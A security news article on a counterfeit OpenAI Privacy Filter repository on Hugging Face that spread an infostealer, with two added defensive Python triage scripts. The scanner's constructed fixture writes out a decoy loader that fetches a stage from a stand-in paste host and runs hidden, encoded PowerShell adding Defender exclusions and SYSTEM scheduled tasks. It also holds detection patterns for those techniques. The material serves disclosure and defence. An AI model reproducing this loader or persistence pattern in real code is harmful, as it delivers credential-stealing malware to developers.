Fake OpenAI open-source model tops Hugging Face trending: the 240k-download repository hid malware
Cybersecurity firm HiddenLayer reveals that a malicious model impersonating OpenAI's Privacy Filter surged to the top of Hugging Face's trending list in just 18 hours, drawing more than 240,000 downloads, while hiding a six-stage attack chain that ends in a custom Rust-based information stealer targeting browser passwords, cryptocurrency wallet seed phrases, and SSH keys.
OpenAI launched the open-source model Privacy Filter at the end of April—a lightweight model that can automatically detect and mask personally identifiable information (PII) in text, and was released on Hugging Face under the Apache 2.0 license, quickly attracting a great deal of attention from developers. However, this wave of popularity also attracted uninvited guests.
HiddenLayer disclosed that an account named “Open-OSS” published a near-identical repository on Hugging Face. It was also called privacy-filter, and its model card copied the official OpenAI version almost verbatim. The one addition, buried in the README, is an instruction to run start.bat (Windows) or loader.py (Linux/Mac) after downloading.
Surged to the top in 18 hours, with more than 98% of likes coming from bot accounts
In just 18 hours, this fake repository climbed to first place on Hugging Face’s trending leaderboard, accumulating about 244,000 downloads and 667 likes. HiddenLayer’s tracking found that 657 of those likes came from accounts that match automated bot naming patterns—in other words, more than 98% of the social signals were fabricated. Download numbers were also very likely inflated using the same method, creating a false impression of explosive popularity and luring genuine developers in.
Six-stage attack chain: from fake training output to SYSTEM-level execution
The loader is fairly elaborate. When loader.py runs, it first prints forged model training output (progress bars, synthetic datasets, invented class names) so that it looks like a legitimate AI loader at work. In the background it quietly disables security checks, fetches an encoded command from a public JSON paste site, and hands it to a hidden PowerShell process.
That command downloads a second script from a domain posing as a blockchain analytics API (api.eth-fastscan.org), and that script in turn downloads the real payload: a custom information stealer written in Rust. The stealer adds itself to the Windows Defender exclusion list, registers a scheduled task so that it runs with SYSTEM privileges, and deletes itself once the task has run, leaving almost no trace. Every stage after the loader is Windows-specific (PowerShell, Defender, scheduled tasks), which is why the clean-up advice at the end of this article is aimed at Windows hosts.
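A static triage pass that can be run over a downloaded repository before anything in it is executed, added here as an example; it is not HiddenLayer's tooling and not the loader itself. It flags the two things described above: a README that tells the user to run a script, and loader scripts that spawn hidden PowerShell, carry base64 or -EncodedCommand payloads, fetch a second stage from a URL, add Defender exclusions or register scheduled tasks. Rule names and weights are arbitrary, and the sample repository the script builds in a temporary directory is constructed for the demonstration, with the encoded inner command reduced to inert placeholders.

```python
"""Static triage of a downloaded Hugging Face repository before any file in it is run.
Added example: neither HiddenLayer's tooling nor the malicious loader; rules and fixture are constructed."""
import base64
import re
import tempfile
from pathlib import Path

EXECUTABLE_SUFFIXES = {".bat", ".cmd", ".ps1", ".vbs", ".exe", ".sh", ".py"}
SEP = r"[\s\"',]+"  # argument separator in a shell line or in a Python argv list

# (rule name, pattern, weight); weights are illustrative, not a calibrated score
RULES = [(name, re.compile(pat, re.I), w) for name, pat, w in [
    ("readme_run_instruction", rf"\b(?:run|execute|launch)\s+[\w./\\-]+\.(?:bat|cmd|py|ps1|sh)\b", 3),
    ("hidden_powershell", rf"powershell[^\n]*?-(?:w|windowstyle){SEP}hidden", 4),
    ("execution_policy_bypass", rf"-(?:ep|executionpolicy){SEP}bypass", 2),
    ("encoded_command", rf"-(?:e|enc|encodedcommand){SEP}[A-Za-z0-9+/=]{{20,}}", 4),
    ("defender_exclusion", r"Add-MpPreference|Set-MpPreference|Exclusion(?:Path|Process|Extension)", 5),
    ("scheduled_task", r"\bschtasks\b|Register-ScheduledTask|New-ScheduledTask", 4),
    ("system_account", rf"/ru{SEP}system|-UserId{SEP}SYSTEM|NT AUTHORITY\\SYSTEM", 3),
]]
WEIGHT = {name: w for name, _, w in RULES}
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
URL = re.compile(r"https?://[^\s'\"<>)]+")

def decode_blobs(text):
    """Decode long base64 runs as UTF-16LE (what PowerShell -EncodedCommand uses) or UTF-8."""
    out = []
    for blob in B64_BLOB.findall(text):
        try:
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
        except ValueError:
            continue
        for enc in ("utf-16-le", "utf-8"):
            try:
                s = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            if s.strip() and all(c.isprintable() or c.isspace() for c in s):
                out.append(s)
                break
    return out

def scan_text(text, depth=0):
    """Names of matching rules; decoded payloads are scanned once more, prefixed 'decoded:'."""
    hits = [name for name, rx, _ in RULES if rx.search(text)]
    if depth == 0:
        for payload in decode_blobs(text):
            hits += ["decoded:" + h for h in scan_text(payload, 1)]
    return hits

def triage_repo(root):
    """Scan every file under root; return executables, URLs in scripts, rule hits and a verdict."""
    root, executables, findings, script_urls = Path(root), [], {}, {}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        if path.suffix.lower() in EXECUTABLE_SUFFIXES:
            executables.append(rel)
        if path.stat().st_size > 2_000_000:  # weights and tokenizer blobs are not scanned as text
            continue
        text = path.read_text(encoding="utf-8", errors="ignore")
        if rel in executables and URL.findall(text):
            script_urls[rel] = URL.findall(text)  # where would this script phone home?
        if hits := scan_text(text):
            findings[rel] = hits
    score = sum(WEIGHT[h.split(":", 1)[-1]] for hs in findings.values() for h in hs)
    verdict = "DO NOT RUN" if executables and score >= 5 else "REVIEW" if executables or score else "clean"
    return {"executables": executables, "script_urls": script_urls, "findings": findings,
            "score": score, "verdict": verdict}

# Constructed fixture mirroring the described repo; the encoded inner command is inert placeholders.
SAMPLE_README = """# privacy-filter
Lightweight model that detects and masks PII in text.
Download the repository, then run start.bat (Windows) or loader.py (Linux/Mac).
"""
INNER = "Add-MpPreference -ExclusionPath <redacted>; schtasks /create /ru SYSTEM /tn <redacted>"
ENCODED = base64.b64encode(INNER.encode("utf-16-le")).decode()
SAMPLE_LOADER = '''import subprocess, time, urllib.request
for epoch in range(3):  # theatre: nothing is trained
    print(f"epoch {epoch} loss={0.3 / (epoch + 1):.3f}"); time.sleep(0.1)
stage = urllib.request.urlopen("https://paste.example/raw/stage1").read()
subprocess.Popen(["powershell", "-w", "hidden", "-ep", "bypass", "-enc", "__ENCODED__"])
'''.replace("__ENCODED__", ENCODED)

def build_sample_repo(root):
    """Write the fixture: copied model card, decoy loader, Windows launcher, benign config."""
    root = Path(root)
    (root / "README.md").write_text(SAMPLE_README, encoding="utf-8")
    (root / "loader.py").write_text(SAMPLE_LOADER, encoding="utf-8")
    (root / "start.bat").write_text("@echo off\r\npython loader.py\r\n", encoding="utf-8")
    (root / "config.json").write_text('{"model_type": "bert", "hidden_size": 768}\n', encoding="utf-8")

def demo():
    """Build the fixture in a temporary directory and triage it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_repo(tmp)
        return triage_repo(tmp)

if __name__ == "__main__":
    print(demo())
```

Run it on a real snapshot with triage_repo("path/to/snapshot"). Base64 blobs are decoded and rescanned once because, in the chain described above, the encoded command is what carries the Defender exclusion and scheduled task strings; a scan of the loader's surface text alone would see only a generic PowerShell launch.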
Targets Chrome/Firefox, Discord, cryptocurrency wallets
The stealer is thorough. It pulls everything stored in Chrome and Firefox (passwords, session cookies, browsing history, and the associated encryption keys), goes after Discord accounts, cryptocurrency wallet seed phrases, SSH keys, and FTP credentials, and takes screenshots of every display. It then bundles the haul into a compressed JSON package and sends it to an attacker-controlled server.
It also checks whether it is running inside a virtual machine or sandbox and quietly exits if so. The design is a single strike against real targets: steal everything and vanish.
Not a single incident: at least seven malicious repositories have been identified
HiddenLayer notes that this was not an isolated case. Six more repositories, published at the end of April by a Hugging Face account named “anthfu”, used the identical malicious loader and reported to the same command server. They posed as Qwen3, DeepSeek, and Bonsai models and likewise targeted AI developers.
The attackers do not break into OpenAI or Hugging Face; they publish convincing counterfeits, use bots to push them up the trending rankings, and wait for developers to download and run them. The 2024 LottiePlayer JavaScript library supply chain attack showed how costly that can be: one user lost 10 Bitcoin (worth more than $700,000 at the time).
The fake repository has been taken down on Hugging Face, but as of the time of publication, the platform has not announced any new review mechanism for trending repositories. At present, seven malicious repositories are known. How many more remain undiscovered or have already been deleted is still unknown.
What if you downloaded it?
If you copied Open-OSS/privacy-filter onto a Windows machine and executed any of its files, treat that device as fully compromised: do not log into any service from it until it has been cleaned, and since the payload ran as SYSTEM, a wipe and reinstall is the safe way to clean it. From a clean device, change every credential that was stored in the browser, create new wallets and move the funds out of any wallet whose seed phrase was on the machine, forcibly invalidate all Discord sessions and reset the password, and rotate SSH keys and FTP credentials, all of which should be treated as leaked.
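A host-side check for the persistence described in this article (a Defender exclusion plus a scheduled task running as SYSTEM), added as an example that is not HiddenLayer's or the article's own code. It assumes the responder has exported `schtasks /query /fo CSV /v` and the output of `(Get-MpPreference).ExclusionPath` from the suspect host; the sample rows below are constructed, with a reduced set of schtasks columns, and the hostname, user and task names are invented. Because the article says the stealer removes itself after the task runs, a clean result here does not prove a clean host; the Defender exclusion, which the article does not say is removed, is the more durable artifact to look for.

```python
"""Host-side triage of the persistence described in the article (added example, not HiddenLayer's
tooling): scheduled tasks running as SYSTEM from user-writable paths, and Defender exclusions.
Assumed inputs: `schtasks /query /fo CSV /v` text and the lines of `(Get-MpPreference).ExclusionPath`.
The sample data below is constructed and keeps only a subset of the schtasks columns."""
import csv
import io
import re

# Drive roots ("C:" or "C:\") and directories a standard user can write to, as paths or %ENV% forms
RISKY_LOCATION = re.compile(
    r"^[a-z]:\\?$|\\(?:users|appdata|temp|programdata|public)(?:\\|$)"
    r"|%(?:temp|tmp|appdata|localappdata|public|userprofile)%", re.I)
STEALTH_POWERSHELL = re.compile(
    r"powershell[^\n]*?(?:-(?:w|windowstyle)\s+hidden|-(?:e|enc|encodedcommand)\s)", re.I)
SYSTEM_ACCOUNTS = {"system", r"nt authority\system", "localsystem"}

def is_risky_location(path):
    """True for drive roots and user-writable directories (Users, AppData, Temp, ProgramData, Public)."""
    return bool(RISKY_LOCATION.search(path.strip()))

def command_path(command_line):
    """Executable part of a 'Task To Run' value: the first quoted or whitespace-delimited token."""
    m = re.match(r'\s*"([^"]+)"|\s*(\S+)', command_line)
    return (m.group(1) or m.group(2)) if m else ""

def triage_tasks(csv_text):
    """Flag tasks that run from risky paths or launch stealthy PowerShell; SYSTEM raises severity."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        command = row.get("Task To Run", "")
        reasons = []
        if is_risky_location(command_path(command)):
            reasons.append("runs from user-writable path")
        if STEALTH_POWERSHELL.search(command):
            reasons.append("hidden or encoded PowerShell")
        if not reasons:
            continue
        run_as = row.get("Run As User", "")
        if run_as.strip().lower() in SYSTEM_ACCOUNTS:
            severity = "high"
        elif "hidden or encoded PowerShell" in reasons:
            severity = "medium"
        else:
            severity = "low"  # user-level task from a user path: common for updaters, still worth a look
        findings.append({"task": row["TaskName"], "severity": severity, "run_as": run_as,
                         "command": command, "reasons": reasons})
    return findings

def triage_exclusions(paths):
    """An exclusion over a risky location blinds Defender to anything dropped there."""
    return [{"exclusion": p, "severity": "high" if is_risky_location(p) else "info"}
            for p in paths if p.strip()]

# Constructed sample exports (reduced columns); WS01, alice and the non-Microsoft task names are invented.
SAMPLE_SCHTASKS = r'''"HostName","TaskName","Status","Author","Task To Run","Run As User"
"WS01","\Microsoft\Windows\Defrag\ScheduledDefrag","Ready","Microsoft Corporation","%windir%\system32\defrag.exe -c -h -o -$","SYSTEM"
"WS01","\OneDrive Standalone Update Task-S-1-5-21-1","Ready","Microsoft Corporation","C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe","alice"
"WS01","\SystemHealthCheck","Ready","WS01\alice","C:\Users\alice\AppData\Local\Temp\upd.exe","SYSTEM"
"WS01","\Updater","Ready","WS01\alice","powershell.exe -WindowStyle Hidden -EncodedCommand <redacted>","alice"
'''
SAMPLE_EXCLUSIONS = [r"C:\Program Files\Docker", r"C:\Users\alice\AppData\Local\Temp", "C:\\"]

def demo():
    """Run both checks over the constructed exports."""
    return {"tasks": triage_tasks(SAMPLE_SCHTASKS), "exclusions": triage_exclusions(SAMPLE_EXCLUSIONS)}

if __name__ == "__main__":
    for section, items in demo().items():
        for item in items:
            print(section, item)
```

The severity ladder is deliberately simple: a task in a user-writable path run by the user is usually an updater and is reported as low, hidden or encoded PowerShell is medium, and anything that runs as SYSTEM from a location a user could write to is high, which is the combination the article describes.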